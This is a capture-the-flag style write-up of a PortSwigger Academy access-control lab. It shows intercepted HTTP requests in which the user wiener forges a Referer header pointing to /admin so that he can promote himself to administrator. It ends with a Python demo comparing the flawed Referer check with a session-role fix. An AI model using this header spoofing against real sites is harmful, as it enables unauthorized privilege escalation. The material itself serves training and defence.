| Field | Details |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | Access Control (Referer Header Bypass) |
| Difficulty | Practitioner |
| Objective | Log in as wiener:peter and exploit the flawed access controls to promote yourself to administrator |
Referer-Based Access Control
Logging in as administrator:admin.
Same upgrade/downgrade user list as the previous labs. Upgrading a user and intercepting:
```http
GET /admin-roles?username=carlos&action=upgrade HTTP/2
Host: 0a5900890328db7480793f7b00f00013.web-security-academy.net
Cookie: session=AbBWdQfhOm82O7Y3cU8cE1d7StU6L98N
Referer: https://0a5900890328db7480793f7b00f00013.web-security-academy.net/admin
```
A single GET this time, and the response is:
```http
HTTP/2 302 Found
Location: /admin
```
Following the redirect, carlos is upgraded. Notably, the request carries a Referer header pointing back to /admin, which is a hint that the server treats "came from the admin page" as proof of authorization. Logging in as wiener:peter and intercepting /my-account:
```http
GET /my-account?id=wiener HTTP/2
Host: 0a5900890328db7480793f7b00f00013.web-security-academy.net
Cookie: session=lRJ5xnCpV8JJUE2F6EatToZnA16v1ZDm
```
Switching the request to the admin-roles endpoint, targeting our own username, keeping wiener's session cookie and adding the same Referer header pointing at /admin:
```http
GET /admin-roles?username=wiener&action=upgrade HTTP/2
Host: 0a5900890328db7480793f7b00f00013.web-security-academy.net
Cookie: session=lRJ5xnCpV8JJUE2F6EatToZnA16v1ZDm
Referer: https://0a5900890328db7480793f7b00f00013.web-security-academy.net/admin
```
Again a 302. Following the redirect:
wiener now has admin privileges and the lab is solved. It was good to have these two sections (Path Traversal & Access Control Vulns) to rest a little after HTTP Request Smuggling.
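To make the flaw concrete, here is an added example (my own code, not the Academy's implementation) that parses the raw requests above and runs them through two authorization checks: the Referer-based one the lab models, and a fix that looks the role up from server-side session state. The session store and the role of each token are constructed assumptions for the demo.

```python
from urllib.parse import urlparse, parse_qs

HOST = "0a5900890328db7480793f7b00f00013.web-security-academy.net"

# Constructed stand-in for server-side session state: token -> (user, role).
# The tokens are the ones captured above; the roles are assumed for the demo.
SESSIONS = {
    "AbBWdQfhOm82O7Y3cU8cE1d7StU6L98N": ("administrator", "admin"),
    "lRJ5xnCpV8JJUE2F6EatToZnA16v1ZDm": ("wiener", "user"),
}

# The two upgrade requests from the write-up, as raw text.
ADMIN_REQUEST = (
    f"GET /admin-roles?username=carlos&action=upgrade HTTP/2\nHost: {HOST}\n"
    "Cookie: session=AbBWdQfhOm82O7Y3cU8cE1d7StU6L98N\n"
    f"Referer: https://{HOST}/admin\n")
SPOOFED_REQUEST = (
    f"GET /admin-roles?username=wiener&action=upgrade HTTP/2\nHost: {HOST}\n"
    "Cookie: session=lRJ5xnCpV8JJUE2F6EatToZnA16v1ZDm\n"
    f"Referer: https://{HOST}/admin\n")

def parse_request(raw):
    """Split a raw HTTP request into (path, query params, lower-cased headers)."""
    lines = raw.strip().splitlines()
    _method, target, _version = lines[0].split()
    url = urlparse(target)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    params = {k: v[0] for k, v in parse_qs(url.query).items()}
    return url.path, params, headers

def session_token(headers):
    """Pull the session cookie value out of the Cookie header, if any."""
    for part in headers.get("cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name == "session":
            return value
    return None

def referer_check(raw):
    """Flawed check: any client can set Referer, so this proves nothing."""
    path, _params, headers = parse_request(raw)
    return path == "/admin-roles" and urlparse(headers.get("referer", "")).path == "/admin"

def role_check(raw):
    """Fix: authorize from the role bound to the session on the server."""
    path, _params, headers = parse_request(raw)
    _user, role = SESSIONS.get(session_token(headers), (None, None))
    return path == "/admin-roles" and role == "admin"
```

Run `referer_check(SPOOFED_REQUEST)` and `role_check(SPOOFED_REQUEST)` side by side: the first accepts wiener's request purely because of the forged header, the second rejects it because the session is not an admin one.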